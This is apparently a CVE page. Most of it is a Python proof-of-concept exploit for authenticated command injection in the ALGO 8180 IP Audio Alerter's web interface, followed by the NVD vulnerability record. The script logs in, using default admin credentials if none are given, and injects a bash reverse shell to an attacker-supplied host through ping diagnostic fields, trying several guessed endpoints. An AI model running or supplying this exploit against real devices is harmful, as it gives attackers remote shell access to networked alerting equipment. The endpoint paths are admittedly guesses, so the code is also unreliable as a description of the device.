CVE-2026-0780

#!/usr/bin/env python3 # CVE-2026-0780 PoC - ALGO 8180 IP Audio Alerter Command Injection RCE # Note: Requires valid authentication credentials import requests import sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit_cve_2026_0780(target_ip, target_port=443, username='admin', password='admin', lhost='10.0.0.1', lport=4444): """ Exploit CVE-2026-0780: ALGO 8180 Command Injection Args: target_ip: Target device IP address target_port: Target device web interface port (default: 443) username: Valid username for authentication password: Valid password for authentication lhost: Attacker listening host for reverse shell lport: Attacker listening port for reverse shell """ base_url = f"https://{target_ip}:{target_port}" # Step 1: Authentication login_url = f"{base_url}/api/login" login_data = { "username": username, "password": password } session = requests.Session() try: login_response = session.post(login_url, json=login_data, verify=False, timeout=10) if login_response.status_code != 200: print(f"[-] Authentication failed with status code: {login_response.status_code}") return False print(f"[+] Successfully authenticated as {username}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False # Step 2: Command Injection via Network Diagnostic Tool # Target endpoint varies by firmware version - common paths: # /api/diagnostics/ping, /cgi-bin/diagnostics.cgi, /tools/network.html # Generate reverse shell payload # Using bash reverse shell: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1 reverse_shell = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1" encoded_payload = reverse_shell.replace(' ', '${IFS}') # Common injection points - try multiple endpoints injection_endpoints = [ { "url": f"{base_url}/api/diagnostics/ping", "data": { "target": f"127.0.0.1;{encoded_payload}", "count": "1" } }, { "url": f"{base_url}/cgi-bin/diagnostics.cgi", "data": { "action": "ping", "host": f"127.0.0.1;{encoded_payload}" } } ] for endpoint in injection_endpoints: try: print(f"[*] Attempting injection via {endpoint['url']}") response = session.post(endpoint['url'], data=endpoint['data'], verify=False, timeout=5) # The command injection should trigger immediately print(f"[+] Payload sent to {endpoint['url']}") print(f"[!] Check your listener on {lhost}:{lport} for reverse shell") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed for {endpoint['url']}: {e}") continue # Step 3: Alternative - Direct command execution try: alt_url = f"{base_url}/api/system/command" alt_data = { "command": encoded_payload, "exec": True } print(f"[*] Trying alternative endpoint: {alt_url}") response = session.post(alt_url, json=alt_data, verify=False, timeout=5) print(f"[+] Alternative payload sent") except Exception as e: print(f"[-] Alternative method failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-0780.py <target_ip> [port] [username] [password] [lhost] [lport]") print("Example: python cve-2026-0780.py 192.168.1.100 443 admin password 10.0.0.1 4444") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 user = sys.argv[3] if len(sys.argv) > 3 else "admin" pwd = sys.argv[4] if len(sys.argv) > 4 else "admin" lhost = sys.argv[5] if len(sys.argv) > 5 else "10.0.0.1" lport = int(sys.argv[6]) if len(sys.argv) > 6 else 4444 print(f"[*] CVE-2026-0780 Exploit for ALGO 8180 IP Audio Alerter") print(f"[*] Target: {target}:{port}") print(f"[*] Using credentials: {user}:{pwd}") exploit_cve_2026_0780(target, port, user, pwd, lhost, lport)

{"cve": {"id": "CVE-2026-0780", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:05.357", "lastModified": "2026-02-13T21:02:18.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28289."}, {"lang": "es", "value": "Vulnerabilidad de inyección de comandos y ejecución remota de código en la interfaz de usuario web de ALGO 8180 IP Audio Alerter. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de dispositivos ALGO 8180 IP Audio Alerter. Se requiere autenticación para explotar esta vulnerabilidad.\n\nLa falla específica reside en la interfaz de usuario basada en web. El problema se debe a la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar una llamada al sistema. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del dispositivo. Fue ZDI-CAN-28289."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:algosolutions:8180_ip_audio_alerter_firmware:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "853BF5C9-122B-4F47-9CE7-DA3E307130ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:algosolutions:8180_ip_audio_alerter:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A20E73F-D499-4973-ADDE-8B702E6F5254"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-002/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}